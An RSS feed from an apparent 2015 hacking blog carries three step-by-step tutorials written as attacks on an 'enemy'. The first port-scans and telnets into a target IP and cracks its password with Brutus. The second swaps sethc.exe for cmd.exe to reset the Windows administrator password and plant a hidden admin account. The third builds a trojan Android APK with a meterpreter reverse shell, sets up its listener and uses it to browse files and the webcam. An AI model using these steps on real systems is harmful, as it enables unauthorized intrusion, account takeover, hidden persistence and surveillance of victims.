<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title>aalizzwell</title>
		<link>http://aalizzwellhack.at.ua/</link>
		<description>Blog</description>
		<lastBuildDate>Fri, 15 May 2015 09:55:15 GMT</lastBuildDate>
		<generator>uCoz Web-Service</generator>
		<atom:link href="https://aalizzwellhack.at.ua/blog/rss" rel="self" type="application/rss+xml" />
		
		<item>
			<title>H A C K _A _ C O M P U T E R _ W I T H _ I P _ A D D R E S S</title>
			<description>This Tutorial will teach you to hack a computer with ip a d d r s&lt;br&gt;
&lt;br&gt;
[ STEP 1 ] : G e t the Ip Address of y o u r enemies co m p u t e r&lt;br&gt;
&lt;br&gt;
[ eg ] : 69.171.230.5&lt;br&gt;
&lt;br&gt;
[ STEP 2 ]: D o w n l o ad and install p o r t s c a n n e r&lt;br&gt;&lt;br&gt;
http://www.radmin.com/products/utilities/portscanner.php
&lt;br&gt;
&lt;br&gt;
[ STEP 3 ]: O p e n the port s c a n n e r and s c a n the i p 
&lt;br&gt;
&lt;br&gt;
[ STEP 4 ]: I t will show all open p o r t s o n the i p &lt;br&gt;
[ eg ]: port 85
&lt;br&gt;
&lt;br&gt;&lt;br&gt;
Now I n windows click start b u t t o n and t y p e cmd 
&lt;br&gt;&lt;br&gt;
y o u will see a black file named cmd in t h e star t search results , o p e n i t
&lt;br&gt;&lt;br&gt;
A black box will pop up
&lt;br&gt;&lt;br&gt;
[ STEP 5 ]: I n The B l a c k b o x, t y p e
 Telnet (y o u r e n e m y i p) (p o r t)
&lt;br&gt;&lt;br&gt;
[ eg ]: telnet 69.171.230.5 85
&lt;br&gt;&lt;br&gt;
c l i c k E n t e r
&lt;br&gt;&lt;br&gt;
now i t ask for U s e r n a m e A n d P a s s w o r d
&lt;br&gt;&lt;br&gt;
i f there is no P a s s w o r d 
&lt;br&gt;&lt;br&gt;
 J u s t type Username and C l i c k E n t e r
&lt;br&gt;&lt;br...</description>
			<content:encoded>This Tutorial will teach you to hack a computer with ip a d d r s&lt;br&gt;
&lt;br&gt;
[ STEP 1 ] : G e t the Ip Address of y o u r enemies co m p u t e r&lt;br&gt;
&lt;br&gt;
[ eg ] : 69.171.230.5&lt;br&gt;
&lt;br&gt;
[ STEP 2 ]: D o w n l o ad and install p o r t s c a n n e r&lt;br&gt;&lt;br&gt;
http://www.radmin.com/products/utilities/portscanner.php
&lt;br&gt;
&lt;br&gt;
[ STEP 3 ]: O p e n the port s c a n n e r and s c a n the i p 
&lt;br&gt;
&lt;br&gt;
[ STEP 4 ]: I t will show all open p o r t s o n the i p &lt;br&gt;
[ eg ]: port 85
&lt;br&gt;
&lt;br&gt;&lt;br&gt;
Now I n windows click start b u t t o n and t y p e cmd 
&lt;br&gt;&lt;br&gt;
y o u will see a black file named cmd in t h e star t search results , o p e n i t
&lt;br&gt;&lt;br&gt;
A black box will pop up
&lt;br&gt;&lt;br&gt;
[ STEP 5 ]: I n The B l a c k b o x, t y p e
 Telnet (y o u r e n e m y i p) (p o r t)
&lt;br&gt;&lt;br&gt;
[ eg ]: telnet 69.171.230.5 85
&lt;br&gt;&lt;br&gt;
c l i c k E n t e r
&lt;br&gt;&lt;br&gt;
now i t ask for U s e r n a m e A n d P a s s w o r d
&lt;br&gt;&lt;br&gt;
i f there is no P a s s w o r d 
&lt;br&gt;&lt;br&gt;
 J u s t type Username and C l i c k E n t e r
&lt;br&gt;&lt;br&gt;
D o n e !
&lt;br&gt;&lt;br&gt;&lt;br&gt;
(now u can execute cmd commands to access his file search in google for cmd command to access file copy,paste,delete files)&lt;br&gt;&lt;br&gt;
I F Your E n e m y I p has P a s s w o r d then Y o u have t o c r a c k I t &lt;br&gt;&lt;br&gt;D o w n l o a d B r u t u s T o C r a c k P a s s w o r d&lt;br&gt;&lt;br&gt;
sectools.org/tool/brutus/
&lt;br&gt;&lt;br&gt;
T h a n k s F o r R e a d i n g&lt;br&gt;:D
&lt;br&gt;&lt;br&gt; (if there is no open ports u cannot hack him or else u have to manually access his computer and open a port in the firewall without him knowing)</content:encoded>
			<link>https://aalizzwellhack.at.ua/blog/h_a_c_k_a_c_o_m_p_u_t_e_r_w_i_t_h_i_p_a_d_d_r_e_s_s/2015-05-15-7</link>
			<dc:creator>none</dc:creator>
			<guid>https://aalizzwellhack.at.ua/blog/h_a_c_k_a_c_o_m_p_u_t_e_r_w_i_t_h_i_p_a_d_d_r_e_s_s/2015-05-15-7</guid>
			<pubDate>Fri, 15 May 2015 09:55:15 GMT</pubDate>
		</item>
		<item>
			<title>Hack an Admin account with a Guest account</title>
			<description>In this tutorial i will tell you how to hack a computer&apos;s admin accnt&lt;br&gt;
&lt;br&gt;
In windows 7 or xp or windows 8 &lt;br&gt;
&lt;br&gt;
Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command promptwith administratorprivilages because no user has logged on. From there we can hackthe administrator password,even from a guest account.

Prerequisites

Guest account with write access to system 32.

Here is how to do that -

*.Go toC:/windows/system32

* &lt;br&gt;
.Copy cmd.exe and paste it on desktop

*.&lt;br&gt;
rename cmd.exe to sethc.exe

*.&lt;br&gt;
Copy the new sethc.exe to system 32,&lt;br&gt;
when windowsasks for overwriting the file,then click yes.

*.&lt;br&gt;
Now Log out from your guest account and at the user select window,press shift key 5 times.

*.&lt;br&gt;
Instead of Sticky Key confirmation dialog,co...</description>
			<content:encoded>In this tutorial i will tell you how to hack a computer&apos;s admin accnt&lt;br&gt;
&lt;br&gt;
In windows 7 or xp or windows 8 &lt;br&gt;
&lt;br&gt;
Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command promptwith administratorprivilages because no user has logged on. From there we can hackthe administrator password,even from a guest account.

Prerequisites

Guest account with write access to system 32.

Here is how to do that -

*.Go toC:/windows/system32

* &lt;br&gt;
.Copy cmd.exe and paste it on desktop

*.&lt;br&gt;
rename cmd.exe to sethc.exe

*.&lt;br&gt;
Copy the new sethc.exe to system 32,&lt;br&gt;
when windowsasks for overwriting the file,then click yes.

*.&lt;br&gt;
Now Log out from your guest account and at the user select window,press shift key 5 times.

*.&lt;br&gt;
Instead of Sticky Key confirmation dialog,command prompt with full administratorprivileges will open.

*.Now type “NET USERADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.

*.&lt;br&gt;
You will see “ The Command completed successfully” and then exit the command promptand login into administratorwith your new password.

*.Congrats You have hacked admin from guest account.

Further..

Also, you can further create a new user at the command prompt by typing “NET USER XERO /ADD” where “XERO” is the username you would like to add with administratorprivileges. &lt;br&gt;
Then hide your newly created admin account by -

Go to registry editor and navigate to this key

[HKEY_LOCAL_MACHINE&amp;#92;SOFTWARE&amp;#92;Microsoft&amp;#92;Windows NT&amp;#92;CurrentVersion&amp;#92;Winlogon&amp;#92;SpecialAccounts&amp;#92;UserList]

Here create a new DWORD value, write its name as the “user name” that u created for your admin account and live with your admin account forever :)
&lt;br&gt;
Thanx 4 reading &lt;br&gt;
stay connected !!&lt;br&gt;
Any dought you can post me in fb or comment here</content:encoded>
			<link>https://aalizzwellhack.at.ua/blog/hack_an_admin_account_with_a_guest_account/2015-05-15-2</link>
			<dc:creator>none</dc:creator>
			<guid>https://aalizzwellhack.at.ua/blog/hack_an_admin_account_with_a_guest_account/2015-05-15-2</guid>
			<pubDate>Fri, 15 May 2015 06:03:12 GMT</pubDate>
		</item>
		<item>
			<title>Hack and Controll Android remotely with kali linux (backTrack6)</title>
			<description>This is a tutorial explaining how to remotely hack android device using Metasploit in Kali 

How to Install Kali Linux?(search in google)

Metasploit is one of my favorite security tools. What some don’t know is that Metasploit has added some functionality for security testing Android Devices. In this post we will show you how to get a remote shell on an Android by using Metasploit in Kali Linux.
Read this article to know more about Metasploit: Introduction to using Metasploit in Kali Linux
We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and once it sees it, create a fully functional remote shell to the device.
First up you need to find yourpublic/external ipandport forwarding 
Let&apos;s start,
Creating a booby trapped APK file
Now we need to create the APK that will include a remote shell. To do so, we will us...</description>
			<content:encoded>This is a tutorial explaining how to remotely hack android device using Metasploit in Kali 

How to Install Kali Linux?(search in google)

Metasploit is one of my favorite security tools. What some don’t know is that Metasploit has added some functionality for security testing Android Devices. In this post we will show you how to get a remote shell on an Android by using Metasploit in Kali Linux.
Read this article to know more about Metasploit: Introduction to using Metasploit in Kali Linux
We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and once it sees it, create a fully functional remote shell to the device.
First up you need to find yourpublic/external ipandport forwarding 
Let&apos;s start,
Creating a booby trapped APK file
Now we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.
1. In Kali Linux, open a terminal prompt and type:
sudo msfpayload android/meterpreter/reverse_tcp LHOST= 192.168.1.16LPORT=4444R &gt;app.apk
(Replace the highlighted part with your Kali Linux IP address in for theLHOSTaddress and forwarded port in for theLPORTaddress.)
The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file with it.
Once this is run, a file called “app.apk” will be created:
2. Now just send this file to your Android device, I used a Smart Phone in this instance.
3. When the file is installing on the Android, it will come up like all apps and show you what capabilities it wants access to on your phone. It lists like every possibility I think, basically total access to the phone. This should be a warning to users that this isn’t an app that they should be running!
Now that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.
4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.
5. Once Metasploit starts, type in the following to create a listener:
user exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16 (enter your Kali IP address)
set lport 4444
Then just typeexploitto start the handler:
6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.
7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.
On your Metaploit system you should see this:
An active session is created and it drops you automatically into a meterpreter prompt.
8. From here your can type “sysinfo” to get information on the device:
9. You can see the processes running by typing, “ps”:
You are done!
Now you can surf the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.
Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.
Typing “help” at a meterpreter prompt will list all the command that are available.
We can also run the shell command that will drop us into a direct Terminal shell if we want:
meterpreter &gt; shell
Process 1 created.
Channel 1 created.
ls
The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.
But if the phone was rooted, I should have been able to access them… Remotely…
This should be noted by people who have rooted their phone!
And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…
Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make pay phone calls, this should be a red flag.</content:encoded>
			<link>https://aalizzwellhack.at.ua/blog/hack_and_controll_android_remotely_with_kali_linux_backtrack6/2015-05-14-1</link>
			<dc:creator>none</dc:creator>
			<guid>https://aalizzwellhack.at.ua/blog/hack_and_controll_android_remotely_with_kali_linux_backtrack6/2015-05-14-1</guid>
			<pubDate>Thu, 14 May 2015 14:52:18 GMT</pubDate>
		</item>
	</channel>
</rss>